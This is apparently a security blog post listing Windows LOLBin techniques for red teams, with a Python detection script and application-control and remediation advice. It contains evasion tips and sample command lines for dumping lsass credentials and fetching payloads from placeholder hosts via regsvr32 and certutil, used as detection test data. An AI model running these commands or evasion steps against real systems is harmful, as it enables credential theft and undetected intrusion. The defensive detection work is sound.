BIPI

Living-Off-the-Land Binaries (LOLBins) for Red Teams: A Working Operator Set

Cybersecurity

LOLBins remain the most reliable post-exploitation surface on modern Windows. This guide gives a working operator set drawn from the LOLBAS project, covers detection-aware usage, and pairs each technique with the EDR telemetry it generates and the application control rule that kills it.

By Arjun Raghavan, Security & Systems Lead, BIPI · November 29, 2023 · 12 min read

#lolbins #lolbas #windows #edr #red-team

Why LOLBins still pay

Signed Microsoft binaries are everywhere, allowlisted everywhere, and trusted by most legacy AV. Living off the land bypasses delivery-time detection by avoiding novel binaries altogether. The catch is behaviour-based EDR, which is now the real adversary.

The LOLBAS project as ground truth

  • Maintained catalog of signed Windows binaries abused in the wild.
  • Each entry includes ATT&CK mapping and detection notes.
  • Use the JSON feed to keep your operator playbooks current.

Execution: the workhorse trio

  1. rundll32.exe for DLL execution under a trusted parent.
  2. regsvr32.exe scrobj for scriptlet execution, classic Squiblydoo.
  3. msbuild.exe for inline XML build files that execute C# at runtime.

Download: trusted transfer

  • certutil.exe -urlcache for direct HTTP fetch, noisy but signed.
  • bitsadmin.exe for asynchronous transfer that survives session changes.
  • curl.exe shipped with modern Windows, lean and obvious.

Persistence under the radar

  1. schtasks.exe with a payload triggered by user login.
  2. wmic.exe with an event subscription for fileless persistence.
  3. Registry Run keys created via reg.exe with a benign-looking value name.

Credential access

  • comsvcs.dll MiniDump function called via rundll32 for lsass capture.
  • wmic process call create for stealthy execution that bypasses some EDR hooks.
  • vssadmin for shadow copy creation that exposes ntds.dit on domain controllers.

Detection-aware patterns

  • Set realistic parent processes via process hollowing or PPID spoofing.
  • Avoid characteristic command-line strings; EDR vendors hash them and look them up.
  • Pace operations so you do not light up beacon timing analytics.

Telemetry your client should collect

  1. Sysmon with the SwiftOnSecurity baseline plus tuning for LOLBAS entries.
  2. EDR rules from MITRE ATT&CK that map to T1218 sub-techniques.
  3. Process command-line logging via group policy.
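A small detection pass over constructed Sysmon-style process-creation records, added here as an example and not code from the original post or from the LOLBAS project: each rule keys on the argument shape of a LOLBAS entry named above rather than on the binary name alone, and the ATT&CK IDs are the public sub-technique numbers those entries map to. The sample records, file paths and hostnames are constructed.

```python
import re

# Constructed Sysmon Event ID 1 style records (Image, ParentImage, CommandLine);
# not real telemetry. Two benign rows are included so the rules can be checked
# for false positives as well as hits.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\cmd.exe",
     r"rundll32.exe C:\Windows\System32\comsvcs.dll,MiniDump 712 C:\Users\Public\m.dmp full"),
    (r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\System32\cmd.exe",
     r"regsvr32.exe /s /n /u /i:http://example.invalid/x.sct scrobj.dll"),
    (r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
     r"certutil.exe -urlcache -split -f http://example.invalid/x.exe x.exe"),
    (r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe", r"C:\Windows\explorer.exe",
     r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\build.xml"),
    (r"C:\Windows\System32\rundll32.exe", r"C:\Windows\explorer.exe",
     r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL desk.cpl"),
    (r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe", r"C:\Program Files\dotnet\dotnet.exe",
     r"MSBuild.exe C:\src\app\app.csproj /t:Build"),
]

# (rule name, ATT&CK ID, image basename, command-line pattern). Patterns are kept
# narrow on purpose: rundll32 and msbuild run legitimately all day, so the rule
# must match the LOLBAS argument shape, not just the binary.
RULES = [
    ("rundll32 comsvcs MiniDump", "T1003.001", "rundll32.exe",
     re.compile(r"comsvcs\.dll.*MiniDump", re.I)),
    ("regsvr32 scriptlet (Squiblydoo)", "T1218.010", "regsvr32.exe",
     re.compile(r"/i:\S+\s+scrobj\.dll", re.I)),
    ("certutil URL fetch", "T1105", "certutil.exe",
     re.compile(r"-urlcache\b.*https?://", re.I)),
    ("msbuild project from user-writable path", "T1127.001", "msbuild.exe",
     re.compile(r"(?:\\Users\\[^\\]+\\AppData|\\Temp|\\Users\\Public)\\.*\.(?:xml|csproj|proj)", re.I)),
]

def basename(path):
    """Lower-cased file name of a Windows path, used to match the Image field."""
    return path.rsplit("\\", 1)[-1].lower()

def evaluate(events=SAMPLE_EVENTS):
    """Return one (rule name, ATT&CK ID, parent basename, command line) per matching event."""
    hits = []
    for image, parent, cmdline in events:
        for name, ttp, binary, pattern in RULES:
            if basename(image) == binary and pattern.search(cmdline):
                hits.append((name, ttp, basename(parent), cmdline))
    return hits

if __name__ == "__main__":
    for name, ttp, parent, cmdline in evaluate():
        print(f"[{ttp}] {name} (parent {parent}): {cmdline}")
```

The parent basename is carried into each hit because, as the PPID-spoofing point below notes, an unexpected parent is often the only thing separating an abuse from an administrator's legitimate use of the same binary.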

Application control that actually kills LOLBins

  • AppLocker rules that block rundll32, regsvr32, and msbuild for non-IT users.
  • Windows Defender Application Control policies with explicit publisher rules.
  • Constrained Language Mode for PowerShell in user contexts.

Operator hygiene

  • Never reuse the same LOLBin technique twice in one engagement.
  • Pair every download primitive with a different execution primitive.
  • Document the EDR sensor you bypassed, with version, for the report.

  • 72: LOLBAS entries actively useful
  • 81%: Engagements where rundll32 works
  • 23%: Clients with AppLocker enforced

The binary is signed by Microsoft, the behaviour is signed by you. EDR can only see one of those clearly.

Remediation, ordered by effort

  1. Enable application control in audit mode and harvest baseline.
  2. Move to enforce on a pilot ring of standardised workstations.
  3. Layer behavioural EDR rules tuned to your environment.
  4. Roll Constrained Language Mode and signed-script-only PowerShell across the fleet.
